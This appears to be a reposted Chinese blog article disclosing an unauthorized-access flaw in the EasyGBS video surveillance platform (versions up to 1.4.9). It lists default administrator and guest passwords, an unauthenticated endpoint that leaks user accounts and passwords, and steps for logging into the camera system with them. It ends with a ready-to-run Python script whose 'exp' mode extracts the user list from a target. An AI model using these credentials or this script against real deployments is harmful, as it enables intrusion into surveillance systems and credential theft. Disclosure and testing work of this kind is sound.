其他分享
首页 > 其他分享> > EasyGBS未授权访问漏洞

EasyGBS未授权访问漏洞

作者:互联网

一、漏洞详情

EasyGBS是由TSINGSEE开发一款国标视频云平台。EasyGBS<=1.4.9版本的平台存在未授权访问漏洞,攻击者可以直接访问平台的API接口文档,从而获取系统的API接口造成信息泄露。

二、影响版本

EasyGBS <= 1.4.9image.png

三、漏洞利用

1、默认口令:

easygbs/easygbs  #  管理员权限
guest2020/guest2014&2020  #  游客权限

2、API接口文档:/apidoc/#api-device

image.png

3、用户账户密码信息泄露:/api/v1/userlist?pageindex=0&pagesize=10

image.png

4、利用泄露的用户信息,登陆视频监控系统:

image.png

image.png

5、POC漏洞脚本检测

import requests
from bs4 import BeautifulSoup
import sys

def check_poc(result):
    bf = BeautifulSoup(result.text, 'lxml')
    list_1 = bf.find_all('div', class_='spinner')
    if list_1:
        return True
    else:
        return False

def check_exp(result):
    if "UserList" in result.text:
        return True
    else:
        return False

class Scan():
    def poc(self, url):
        payload_1 = r'/apidoc/#api-device'
        headers = {
            'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            result = requests.get(url + payload_1, headers=headers)
            if result.status_code == 200 and check_poc(result):
                return {
                    0: "[+] 存在EasyGBS未授权访问漏洞!",
                    1: "API文档地址:{}".format(url + payload_1),
                }
            else:
                return {0: "[-] 不存在EasyGBS未授权访问漏洞!"}
        except:
            return {0: "[-] 可能不存在EasyGBS未授权访问漏洞!"}

    def exp(self, url):
        payload_2 = r'/api/v1/userlist?pageindex=0&pagesize=10'
        headers = {
            'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            result = requests.get(url + payload_2, headers=headers)
            if result.status_code == 200 and check_exp(result):
                info = result.json()['UserList']
                result_list = []
                for i in range(len(info)):
                    result_list.append([i,info[i]])
                return result_list
            else:
                return {0: "[-] 获取用户信息失败!"}
        except:
            return {0: "[-] 可能获取用户信息失败!"}

if __name__ == "__main__":
    url = sys.argv[1]
    type = sys.argv[2]
    scan = Scan()
    if type == 'poc':
        result = scan.poc(url)
    else:
        result = scan.exp(url)
    print(dict(result))

 

标签:return,EasyGBS,url,漏洞,result,授权,headers
来源: https://blog.csdn.net/qq_41832837/article/details/117476973